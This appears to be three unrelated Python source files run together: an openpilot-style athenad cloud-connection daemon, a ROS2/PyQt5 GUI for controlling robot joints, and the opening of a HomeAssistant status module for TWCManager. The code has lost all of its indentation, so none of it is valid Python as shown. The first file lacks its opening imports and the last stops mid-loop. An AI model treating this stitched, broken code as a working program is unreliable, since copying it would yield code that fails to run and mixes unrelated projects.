from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, WebSocketException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.file_helpers import CallbackReader
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC, TICI
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
from selfdrive.version import version, get_version, get_git_remote, get_git_branch, get_git_commit
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://api.retropilot.org:4040')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = set([8022])
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
WS_FRAME_SIZE = 4096
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
log_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress'], defaults=(0, False, 0))
cur_upload_items = {}
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def upload_handler(end_event):
tid = threading.get_ident()
while not end_event.is_set():
cur_upload_items[tid] = None
try:
cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
if cur_upload_items[tid].id in cancelled_uploads:
cancelled_uploads.remove(cur_upload_items[tid].id)
continue
try:
def cb(sz, cur):
cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
_do_upload(cur_upload_items[tid], cb)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError) as e:
cloudlog.warning(f"athena.upload_handler.retry {e} {cur_upload_items[tid]}")
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
item = item._replace(
retry_count=item.retry_count + 1,
progress=0,
current=False
)
upload_queue.put_nowait(item)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
if callback:
f = CallbackReader(f, callback, size)
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_git_remote(),
"branch": get_git_branch(),
"commit": get_git_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0):
destination = {
"latitude": latitude,
"longitude": longitude,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
def scan_dir(path, prefix):
files = list()
# only walk directories that match the prefix
# (glob and friends traverse entire dir tree)
with os.scandir(path) as i:
for e in i:
rel_path = os.path.relpath(e.path, ROOT)
if e.is_dir(follow_symlinks=False):
# add trailing slash
rel_path = os.path.join(rel_path, '')
# if prefix is a partial dir name, current dir will start with prefix
        # if prefix is a partial file name, prefix will start with dir name
if rel_path.startswith(prefix) or prefix.startswith(rel_path):
files.extend(scan_dir(e.path, prefix))
else:
if rel_path.startswith(prefix):
files.append(rel_path)
return files
@dispatcher.add_method
def listDataDirectory(prefix=''):
return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
def listUploadQueue():
items = list(upload_queue.queue) + list(cur_upload_items.values())
return [i._asdict() for i in items if i is not None]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = set(item.id for item in list(upload_queue.queue))
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
dongle_id = Params().get("DongleId", encoding='utf-8')
api = Api(dongle_id)
manage_tokens(api)
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
params = Params()
dongle_id = params.get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub', 'r') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworks():
return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# excluding most recent (active) log file
return sorted(logs)[:-1]
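# Illustrative note: a log file counts as "sent" when its user.upload xattr
# (LOG_ATTR_NAME) holds a recent unix time; log_handler() below stamps the
# current time before forwarding and LOG_ATTR_VALUE_MAX_UNIX_TIME on success.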
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop() # newest log file
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path, "r") as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
log_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.ws_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = log_send_queue.get(timeout=1)
for i in range(0, len(data), WS_FRAME_SIZE):
frame = data[i:i+WS_FRAME_SIZE]
last = i + WS_FRAME_SIZE >= len(data)
opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
ws.send_frame(ABNF.create_frame(frame, opcode, last))
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
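# Illustrative note: backoff() gives a capped, randomized exponential delay in
# seconds, e.g. retries=3 -> a value in [0, 8), and anything >= 7 retries is
# capped at [0, 128).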
def manage_tokens(api):
if not TICI:
return
try:
params = Params()
mapbox = api.get(f"/v1/tokens/mapbox/{api.dongle_id}/", timeout=5.0, access_token=api.get_token())
if mapbox.status_code == 200:
params.put("MapboxToken", mapbox.json()["token"])
else:
params.delete("MapboxToken")
except Exception:
cloudlog.exception("Failed to update tokens")
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
# params.delete("PrimeRedirected")
manage_tokens(api)
conn_retries = 0
cur_upload_items.clear()
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
pass
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
pass
# params.delete("PrimeRedirected")
# params.delete("LastAthenaPingTime")
except socket.timeout:
pass
# try:
# r = requests.get("http://api.retropilot.org/v1/me", allow_redirects=False,
# headers={"User-Agent": f"openpilot-{version}"}, timeout=15.0)
# if r.status_code == 302 and r.headers['Location'].startswith("http://u.web2go.com"):
# params.put_bool("PrimeRedirected", True)
# except Exception:
# cloudlog.exception("athenad.socket_timeout.exception")
# params.delete("LastAthenaPingTime")
# except Exception:
# cloudlog.exception("athenad.main.exception")
# conn_retries += 1
# params.delete("PrimeRedirected")
# params.delete("LastAthenaPingTime")
# time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
robot_gui.py
|
import sys
import time
import ast
import csv
import os
import math
import threading
import numpy
import rclpy
from rclpy.node import Node
from std_msgs.msg import String
from sensor_msgs.msg import JointState
from robot_msgs.msg import GuiToRobot, RobotToGui
from ament_index_python.packages import get_package_share_directory
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
class CommVariables():
trigger_node = None
trigger_ui = None
to_robot = GuiToRobot()
from_robot = JointState()
to_robot.gui_control_enabled = False
to_robot.gui_speed_control = 50
to_robot.gui_joint_control = []
node_name = ""
saved_poses_file = ""
joint_names = []
joint_limit_max = []
joint_limit_min = []
no_of_joints = 0
joint_tolerance = 0.01
poses = {}
def load_poses(file):
result = {}
with open(file, 'r') as joint_csv:
joint_csv_reader = csv.reader(joint_csv, delimiter=':')
for row in joint_csv_reader:
if len(row) == 2 and len(ast.literal_eval(row[1])) == CommVariables.no_of_joints:
result[row[0]] = rad_pose_to_deg(ast.literal_eval(row[1]))
return result
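# Illustrative note: each line of the saved-poses file is colon-delimited,
# "name:[j1, j2, ...]" with joint values in radians, e.g.
#   home:[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
# (the pose name "home" is just an example); load_poses() converts each pose
# to degrees via rad_pose_to_deg() on load.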
def pose_from_position(poses, joints):
result = "unknown"
for pose, position in poses.items():
if len(position) != len(joints):
continue
if all(numpy.isclose(position[i], joints[i], atol=CommVariables.joint_tolerance) for i in range(len(joints))):
result = pose
break
return result
def rad_pose_to_deg(pose):
return list(map(lambda x: 180*x/math.pi, pose))
def deg_pose_to_rad(pose):
return list(map(lambda x: x*math.pi/180, pose))
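def _example_pose_roundtrip():
    # Illustrative only: the two helpers above are inverses (up to float rounding),
    # converting whole poses between degrees and radians.
    pose_deg = [0.0, 45.0, 90.0]
    return rad_pose_to_deg(deg_pose_to_rad(pose_deg))  # ~[0.0, 45.0, 90.0]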
class RobotGUI(Node, CommVariables):
def __init__(self):
super().__init__(
node_name= "robot_gui"
)
CommVariables.trigger_node = self.trigger
CommVariables.node_name = self.get_namespace() + "/" + self.get_name()
CommVariables.saved_poses_file = self.declare_parameter("saved_poses_file").value
CommVariables.joint_names = self.declare_parameter("joint_names").value
CommVariables.no_of_joints = len(CommVariables.joint_names)
        # the trailing commas below wrap these parameters in a tuple, so index with [0] when using them
CommVariables.joint_limit_max = self.declare_parameter("joint_limit_max", value=[180]*self.no_of_joints).value,
CommVariables.joint_limit_min = self.declare_parameter("joint_limit_min", value=[-180]*self.no_of_joints).value,
CommVariables.joint_tolerance = 180.0/math.pi * self.declare_parameter("joint_tolerance", value=0.05).value
CommVariables.poses = load_poses(CommVariables.saved_poses_file)
CommVariables.to_robot.gui_joint_control = [0.0]*self.no_of_joints
self.joint_state_subscriber = self.create_subscription(
JointState,
"joint_states",
self.joint_state_callback,
10)
self.gui_to_robot_publisher = self.create_publisher(
GuiToRobot,
"gui_to_robot",
10)
print("print HEJ gui node")
time.sleep(1)
CommVariables.trigger_ui()
def trigger(self):
print("trigger node")
self.gui_to_robot_publisher.publish(CommVariables.to_robot)
def joint_state_callback(self, data):
CommVariables.from_robot = data
CommVariables.trigger_ui()
class Window(QWidget, CommVariables):
triggerSignal = pyqtSignal()
to_robot_changed_signal = pyqtSignal()
from_robot_changed_signal = pyqtSignal()
poses_changed_signal = pyqtSignal()
force_slider_signal = pyqtSignal()
def __init__(self, parent=None):
super(Window, self).__init__(parent)
CommVariables.trigger_ui = self.trigger
self.triggerSignal.connect(self.update_state_variables)
print("HEJ from window")
self.loaded = False
def changed_to_robot():
CommVariables.trigger_node()
self.to_robot_changed_signal.connect(changed_to_robot)
def trigger(self):
self.triggerSignal.emit()
def update_state_variables(self):
if not self.loaded:
self.loaded = True
self.load_window()
self.from_robot_changed_signal.emit()
def load_window(self):
print("LOADING UI")
grid = QGridLayout()
self.labels = self.make_label_boxes()
self.sliders = self.make_sliders()
self.set_boxes = self.make_set_boxes()
self.gui_control_box = self.make_gui_control_box()
self.estop_box = self.make_estop_box()
self.speed_box = self.make_speed_box()
self.pose_saver_box = self.make_pose_box()
self.pose_goto_box = self.make_pose_goto_box()
self.current_pose_box = self.make_current_pose_box()
# populate the grid with widgets:
for i, s in enumerate(self.sliders):
grid.addWidget(s['box'], i, 0)
for i, l in enumerate(self.labels):
grid.addWidget(l['box2'], i, 1)
grid.addWidget(l['box1'], i, 2)
grid.addWidget(l['box3'], i, 3)
for i, sb in enumerate(self.set_boxes):
grid.addWidget(sb['box'], i, 4)
grid.addWidget(self.speed_box, 6, 0, 1, 4)
grid.addWidget(self.pose_saver_box, 7, 0, 1, 4)
grid.addWidget(self.pose_goto_box, 8, 0, 1, 4)
grid.addWidget(self.current_pose_box, 9, 0, 1, 2)
grid.addWidget(self.estop_box, 9, 2, 1, 1)
grid.addWidget(self.gui_control_box, 9, 3, 1, 1)
self.trigger_enabled()
self.setLayout(grid)
self.setWindowTitle(CommVariables.node_name)
self.resize(600, 250)
# TODO. Change this to signals as well
def trigger_enabled(self):
for l in self.labels:
l['ref_rad'].setEnabled(CommVariables.to_robot.gui_control_enabled)
l['ref_deg'].setEnabled(CommVariables.to_robot.gui_control_enabled)
for s in self.sliders:
s['slider'].setEnabled(CommVariables.to_robot.gui_control_enabled)
for x in self.set_boxes:
x['button'].setEnabled(CommVariables.to_robot.gui_control_enabled)
self.speed_box.setEnabled(CommVariables.to_robot.gui_control_enabled)
self.pose_saver_box.setEnabled(CommVariables.to_robot.gui_control_enabled)
def make_label_boxes(self):
result = []
for i, name in enumerate(CommVariables.joint_names):
label_box_1 = QGroupBox("ref_rad")
ref_rad = QLabel('0.0')
label_box_1_layout = QVBoxLayout()
label_box_1_layout.addWidget(ref_rad)
label_box_1.setLayout(label_box_1_layout)
label_box_1.setMinimumWidth(90)
label_box_1.setMaximumWidth(90)
label_box_2 = QGroupBox("ref_deg")
ref_deg = QLabel('0')
label_box_2_layout = QVBoxLayout()
label_box_2_layout.addWidget(ref_deg)
label_box_2.setLayout(label_box_2_layout)
label_box_2.setMinimumWidth(90)
label_box_2.setMaximumWidth(90)
label_box_3 = QGroupBox("act_rad")
act_rad = QLabel('0.0')
label_box_3_layout = QVBoxLayout()
label_box_3_layout.addWidget(act_rad)
label_box_3.setLayout(label_box_3_layout)
label_box_3.setMinimumWidth(90)
label_box_3.setMaximumWidth(90)
label_box_3.setMinimumWidth(90)
label_box_3.setMaximumWidth(90)
def changed_act(i, label):
value = CommVariables.from_robot.position[i]
label.setText(str(round(value, 5)))
self.from_robot_changed_signal.connect(lambda i = i, label = act_rad: changed_act(i, label))
def changed_ref(i, deg_label, rad_label):
value = CommVariables.to_robot.gui_joint_control[i]
rad_label.setNum(value)
deg_label.setText('{}'.format(round(value * 180 / math.pi, 5)))
self.to_robot_changed_signal.connect(
lambda i = i, deg_label = ref_deg, rad_label=ref_rad:
changed_ref(i, deg_label, rad_label))
result.append({
"name": name,
"box1": label_box_1,
"ref_rad": ref_rad,
"box2": label_box_2,
"ref_deg": ref_deg,
"box3": label_box_3,
"act_rad": act_rad,
})
return result
def make_sliders(self):
result = []
for i, name in enumerate(CommVariables.joint_names):
max_limit = CommVariables.joint_limit_max[0][i]
min_limit = CommVariables.joint_limit_min[0][i]
slider_box = QGroupBox(name)
slider = QSlider(Qt.Horizontal)
slider_box_layout = QVBoxLayout()
slider.setFocusPolicy(Qt.StrongFocus)
slider.setTickPosition(QSlider.TicksBelow)
slider.setTickInterval(5000)
slider.setMinimum(min_limit)
slider.setMaximum(max_limit)
slider.setSingleStep(1)
slider.setMinimumWidth(300)
slider_box_layout.addWidget(slider)
slider_box.setLayout(slider_box_layout)
slider.setValue(0.0)
result.append({"box": slider_box, "slider": slider})
def slider_change(value, joint_no):
CommVariables.to_robot.gui_joint_control[joint_no] = value * math.pi / 180
self.to_robot_changed_signal.emit()
slider.valueChanged.connect(lambda value=slider.value(), joint_no=i: slider_change(value, joint_no))
def force_slider(i, s):
s.setValue(180*CommVariables.to_robot.gui_joint_control[i]/math.pi)
self.force_slider_signal.connect(lambda dummy=False, i=i, s=slider: force_slider(i, s))
return result
def make_set_boxes(self):
result = []
for i in range(CommVariables.no_of_joints):
line_box = QGroupBox("set_ref_deg")
line = QLineEdit()
line.setMinimumWidth(50)
button = QPushButton('set')
line_box_layout = QHBoxLayout()
line_box_layout.addWidget(line)
line_box_layout.addWidget(button)
line_box.setLayout(line_box_layout)
def clicked(jointno, set_box):
value = int(set_box.text())
CommVariables.to_robot.gui_joint_control[jointno] = value * math.pi / 180
self.force_slider_signal.emit()
button.clicked.connect(lambda checked, jointno=i, set_box=line: clicked(jointno, set_box))
result.append({"box": line_box, "button": button, "edit": line})
return result
def make_gui_control_box(self):
radio_box = QGroupBox("gui_control")
radio_box_layout = QHBoxLayout()
radio = QRadioButton("enabled")
radio.setChecked(CommVariables.to_robot.gui_control_enabled)
radio_box_layout.addWidget(radio)
radio_box.setLayout(radio_box_layout)
def toggle():
CommVariables.to_robot.gui_control_enabled = radio.isChecked()
self.trigger_enabled()
self.trigger_node()
radio.toggled.connect(toggle)
return radio_box
def make_estop_box(self):
stop_box = QGroupBox("emergency_stop")
stop_box_layout = QHBoxLayout()
stop_button = QPushButton("STOP")
stop_button.setMaximumWidth(80)
stop_box_layout.addWidget(stop_button)
stop_box.setLayout(stop_box_layout)
def stop_button_clicked():
print('EMERGENCY STOP')
CommVariables.to_robot.gui_control_enabled = True
for i, j in enumerate(CommVariables.from_robot.position):
CommVariables.to_robot.gui_joint_control[i] = j
self.force_slider_signal.emit()
stop_button.clicked.connect(stop_button_clicked)
return stop_box
def make_speed_box(self):
speed_box = QGroupBox("robot_speed")
speed_box_layout = QHBoxLayout()
speed_slider = QSlider(Qt.Horizontal)
speed_slider.setFocusPolicy(Qt.StrongFocus)
speed_slider.setTickPosition(QSlider.TicksBothSides)
speed_slider.setTickInterval(10)
speed_slider.setMinimum(0)
speed_slider.setMaximum(100)
speed_slider.setSingleStep(1)
speed_slider.setMinimumWidth(200)
speed_slider.setValue(CommVariables.to_robot.gui_speed_control)
speed_line = QLineEdit("%")
speed_line.setMaximumWidth(80)
speed_button = QPushButton("set")
speed_box_layout.addWidget(speed_slider)
speed_box_layout.addWidget(speed_line)
speed_box_layout.addWidget(speed_button)
speed_box.setLayout(speed_box_layout)
def speed_slider_change():
CommVariables.to_robot.gui_speed_control = speed_slider.value()
self.to_robot_changed_signal.emit()
def speed_button_clicked():
speed_slider.setValue(int(speed_line.text()))
speed_button.clicked.connect(speed_button_clicked)
speed_slider.valueChanged.connect(speed_slider_change)
return speed_box
def make_pose_box(self):
'''
TODO: Save poses back to the file
'''
pose_saver_box = QGroupBox("pose_saver")
pose_saver_box_layout = QHBoxLayout()
pose_saver_label = QLabel("pose_name")
pose_saver_line = QLineEdit("some_pose_name")
pose_saver_update_button = QPushButton("update")
pose_saver_delete_button = QPushButton("delete")
pose_saver_box_layout.addWidget(pose_saver_label)
pose_saver_box_layout.addWidget(pose_saver_line)
pose_saver_box_layout.addWidget(pose_saver_update_button)
pose_saver_box_layout.addWidget(pose_saver_delete_button)
pose_saver_box.setLayout(pose_saver_box_layout)
pose_saver_box.setEnabled(False)
def pose_saver_update_button_clicked():
pose_name = pose_saver_line.text()
deg_poses = rad_pose_to_deg(CommVariables.from_robot.position)
CommVariables.poses[pose_name] = list(deg_poses)
self.poses_changed_signal.emit()
pose_saver_update_button.clicked.connect(pose_saver_update_button_clicked)
def pose_saver_delete_button_clicked():
pose_name = pose_saver_line.text()
CommVariables.poses.pop(pose_name, None)
self.poses_changed_signal.emit()
pose_saver_delete_button.clicked.connect(pose_saver_delete_button_clicked)
return pose_saver_box
def make_pose_goto_box(self):
combo_box = QGroupBox("go_to_pose")
combo_box_layout = QHBoxLayout()
combo_box_label = QLabel("pose_name")
combo = QComboBox()
combo.setMinimumWidth(400)
combo_box_button = QPushButton("go")
combo_box_button.setMaximumWidth(80)
combo_box_layout.addWidget(combo_box_label)
combo_box_layout.addWidget(combo)
combo_box_layout.addWidget(combo_box_button)
combo_box.setLayout(combo_box_layout)
combo.addItems(CommVariables.poses)
def combo_box_button_clicked():
pose = combo.currentText()
for i, v in enumerate(deg_pose_to_rad(CommVariables.poses[pose])):
CommVariables.to_robot.gui_joint_control[i] = v
self.force_slider_signal.emit()
combo_box_button.clicked.connect(combo_box_button_clicked)
def poses_changed():
combo.clear()
combo.addItems(CommVariables.poses)
self.poses_changed_signal.connect(poses_changed)
return combo_box
def make_current_pose_box(self):
current_pose_box = QGroupBox("current_pose")
current_pose_box_layout = QHBoxLayout()
current_pose_label = QLabel("")
current_pose_box_layout.addWidget(current_pose_label)
current_pose_box.setLayout(current_pose_box_layout)
def update_current_pose_label():
pose_name = pose_from_position(CommVariables.poses, rad_pose_to_deg(CommVariables.from_robot.position))
current_pose_label.setText(pose_name)
self.from_robot_changed_signal.connect(update_current_pose_label)
return current_pose_box
def main(args=None):
def launch_node():
def launch_node_callback_local():
rclpy.init(args=args)
gui = RobotGUI()
rclpy.spin(gui)
gui.destroy_node()
rclpy.shutdown()
t = threading.Thread(target=launch_node_callback_local)
t.daemon = True
t.start()
# Window has to be in the main thread
def launch_window():
app = QApplication(sys.argv)
clock = Window()
clock.show()
sys.exit(app.exec_())
launch_node()
launch_window()
if __name__ == '__main__':
main()
|
HASSStatus.py
|
# HomeAssistant Status Output
# Publishes the provided sensor key and value pair to a HomeAssistant instance
from ww import f
class HASSStatus:
import time
import threading
import requests
apiKey = None
config = None
configConfig = None
configHASS = None
debugLevel = 0
master = None
msgRateInSeconds = 60
resendRateInSeconds = 3600
retryRateInSeconds = 60
msgQueue = {}
status = False
serverIP = None
serverPort = 8123
useHttps = False
timeout = 2
backgroundTasksLock = threading.Lock()
backgroundTasksThread = None
def __init__(self, master):
self.config = master.config
self.master = master
try:
self.configConfig = self.config["config"]
except KeyError:
self.configConfig = {}
try:
self.configHASS = self.config["status"]["HASS"]
except KeyError:
self.configHASS = {}
self.status = self.configHASS.get("enabled", False)
self.serverIP = self.configHASS.get("serverIP", None)
self.serverPort = self.configHASS.get("serverPort", 8123)
self.useHttps = self.configHASS.get("useHttps", False)
self.apiKey = self.configHASS.get("apiKey", None)
self.msgRateInSeconds = self.configHASS.get("msgRateInSeconds", 60)
self.resendRateInSeconds = self.configHASS.get("resendRateInSeconds", 3600)
self.retryRateInSeconds = self.configHASS.get("retryRateInSeconds", 60)
self.debugLevel = self.configConfig.get("debugLevel", 0)
# Unload if this module is disabled or misconfigured
if (
(not self.status)
or (not self.serverIP)
or (int(self.serverPort) < 1)
or (not self.apiKey)
):
self.master.releaseModule("lib.TWCManager.Status", "HASSStatus")
else:
self.backgroundTasksThread = self.threading.Thread(
target=self.background_task_thread, args=()
)
self.backgroundTasksThread.daemon = True
self.backgroundTasksThread.start()
def getTwident(self, twcid):
# Format TWCID nicely
if len(twcid) == 2:
return "%02X%02X" % (twcid[0], twcid[1])
else:
return str(twcid.decode("utf-8"))
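# Illustrative example (values not from the original source): a two-byte TWCID
# such as b"\x12\x34" is formatted as the hex string "1234"; any other length
# is decoded as UTF-8 and returned as a plain string.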
def background_task_thread(self):
while True:
self.time.sleep(self.msgRateInSeconds)
self.backgroundTasksLock.acquire()
for msgKey in self.msgQueue:
